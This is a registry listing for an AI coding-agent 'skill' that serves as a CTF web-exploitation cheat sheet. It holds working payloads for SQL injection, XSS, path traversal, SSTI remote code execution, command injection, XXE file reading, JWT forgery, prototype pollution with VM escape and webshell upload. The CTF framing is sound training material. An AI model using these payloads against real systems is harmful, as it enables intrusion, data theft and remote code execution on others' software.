OpenSkillIndex← back to search
claude-codesecurity

Claude-skill-registry ctf-web

Web exploitation techniques for CTF challenges. Use when solving web security challenges involving XSS, SQLi, CSRF, file upload bypasses, JWT attacks, Web3/blockchain exploits, or other web vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/majiayu000/claude-skill-registry
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/majiayu000/claude-skill-registry "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/data/ctf-web" ~/.claude/skills/majiayu000-claude-skill-registry-ctf-web && rm -rf "$T"
manifest: skills/data/ctf-web/SKILL.md
tags
#ctf-exploitation#web-security#xss#sql-injection#csrf#jwt
source content

CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Additional Resources

  • server-side.md - Server-side attacks: SQLi, SSTI, SSRF, XXE, command injection, code injection (Ruby/Perl/Python), ReDoS, file write→RCE, eval bypass
  • client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements
  • auth-and-access.md - Auth/authz attacks: JWT, session, password inference, weak validation, client-side gates, NoSQL auth bypass
  • node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE
  • web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, Foundry tooling
  • cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass

Reconnaissance

  • View source for HTML comments, check JS/CSS files for internal APIs
  • Look for 
    .map
    source map files
  • Check response headers for custom X- headers and auth hints
  • Common paths: 
    /robots.txt
    , 
    /sitemap.xml
    , 
    /.well-known/
    , 
    /admin
    , 
    /api
    , 
    /debug
    , 
    /.git/
    , 
    /.env
  • Search JS bundles: 
    grep -oE '"/api/[^"]+"'
    for hidden endpoints
  • Check for client-side validation that can be bypassed
  • Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)

SQL Injection Quick Reference

Detection: Send 

'
— syntax error indicates SQLi

' OR '1'='1                    # Classic auth bypass
' OR 1=1--                     # Comment termination
username=\&password= OR 1=1--  # Backslash escape quote bypass
' UNION SELECT sql,2,3 FROM sqlite_master--  # SQLite schema
0x6d656f77                     # Hex encoding for 'meow' (bypass quotes)

See server-side.md for second-order SQLi, LIKE brute-force, SQLi→SSTI chains.

XSS Quick Reference

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter bypass: hex 

\x3cscript\x3e
, entities 
&#60;script&#62;
, case mixing 
<ScRiPt>
, event handlers.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

Path Traversal / LFI Quick Reference

../../../etc/passwd
....//....//....//etc/passwd     # Filter bypass
..%2f..%2f..%2fetc/passwd        # URL encoding
%252e%252e%252f                  # Double URL encoding
{.}{.}/flag.txt                  # Brace stripping bypass

Python footgun: 

os.path.join('/app/public', '/etc/passwd')
returns 
/etc/passwd

JWT Quick Reference

  1. alg: none
    — remove signature entirely
  2. Algorithm confusion (RS256→HS256) — sign with public key
  3. Weak secret — brute force with hashcat/flask-unsign
  4. Key exposure — check 
    /api/getPublicKey
    , 
    .env
    , 
    /debug/config
  5. Balance replay — save JWT, spend, replay old JWT, return items for profit

See auth-and-access.md for full JWT attacks and session manipulation.

SSTI Quick Reference

Detection: 

{{7*7}}
returns 
49

# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Go template
{{.ReadFile "/flag.txt"}}
# EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>

SSRF Quick Reference

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Command Injection Quick Reference

; id          | id          `id`          $(id)
%0aid         # Newline     127.0.0.1%0acat /flag

When cat/head blocked: 

sed -n p flag.txt
, 
awk '{print}'
, 
tac flag.txt

XXE Quick Reference

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

PHP filter: 

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

Code Injection Quick Reference

Ruby 

instance_eval
: Break string + comment: 
VALID');INJECTED_CODE#
Perl 
open()
: 2-arg open allows pipe: 
|command|
JS 
eval
blocklist bypass: 
row['con'+'structor']['con'+'structor']('return this')()
PHP deserialization: Craft serialized object in cookie → LFI/RCE

See server-side.md for full payloads and bypass techniques.

Node.js Quick Reference

Prototype pollution: 

{"__proto__": {"isAdmin": true}}
or flatnest circular ref bypass VM escape: 
this.constructor.constructor("return process")()
→ RCE Full chain: pollution → enable JS eval in Happy-DOM → VM escape → RCE

See node-and-prototype.md for detailed exploitation.

Auth & Access Control Quick Reference

  • Cookie manipulation: 
    role=admin
    , 
    isAdmin=true
  • Host header bypass: 
    Host: 127.0.0.1
  • Hidden endpoints: search JS bundles for 
    /api/internal/
    , 
    /api/admin/
  • Client-side gates: 
    window.overrideAccess = true
    or call API directly
  • Password inference: profile data + structured ID format → brute-force
  • Weak signature: check if only first N chars of hash are validated

See auth-and-access.md for full patterns.

File Upload → RCE

  • .htaccess
    upload: 
    AddType application/x-httpd-php .lol
    + webshell
  • Gogs symlink: overwrite 
    .git/config
    with 
    core.sshCommand
    RCE
  • Python 
    .so
    hijack: write malicious shared object + delete 
    .pyc
    to force reimport
  • ZipSlip: symlink in zip for file read, path traversal for file write
  • Log poisoning: PHP payload in User-Agent + path traversal to include log

See server-side.md for detailed steps.

Multi-Stage Chain Patterns

0xClinic chain: Password inference → path traversal + ReDoS oracle (leak secrets from 

/proc/1/environ
) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → 
.so
write via path traversal → RCE

Key chaining insights:

  • Path traversal + any file-reading primitive → leak 
    /proc/*/environ
    , 
    /proc/*/cmdline
  • CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
  • Arbitrary file write in Python → 
    .so
    hijacking or 
    .pyc
    overwrite for RCE
  • Lowercased response body → use hex escapes (
    \x3c
    for 
    <
    )

Useful Tools

sqlmap -u "http://target/?id=1" --dbs       # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt   # Directory fuzzing
flask-unsign --decode --cookie "eyJ..."      # JWT decode
hashcat -m 16500 jwt.txt wordlist.txt        # JWT crack
dalfox url http://target/?q=test             # XSS

Common Flag Locations

/flag.txt, /flag, /app/flag.txt, /home/*/flag*
Environment variables: /proc/self/environ
Database: flag, flags, secret tables
Response headers: x-flag, x-archive-tag, x-proof
Hidden DOM: display:none elements, data attributes